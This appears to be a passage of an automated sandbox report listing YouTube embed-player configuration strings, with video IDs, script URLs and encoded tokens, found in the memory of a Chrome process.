                                  Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: access-control-allow-origin:https://www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2393573617.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}AYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/e
                                  Source: chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}RIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323781309.000028EC048E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: anaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"e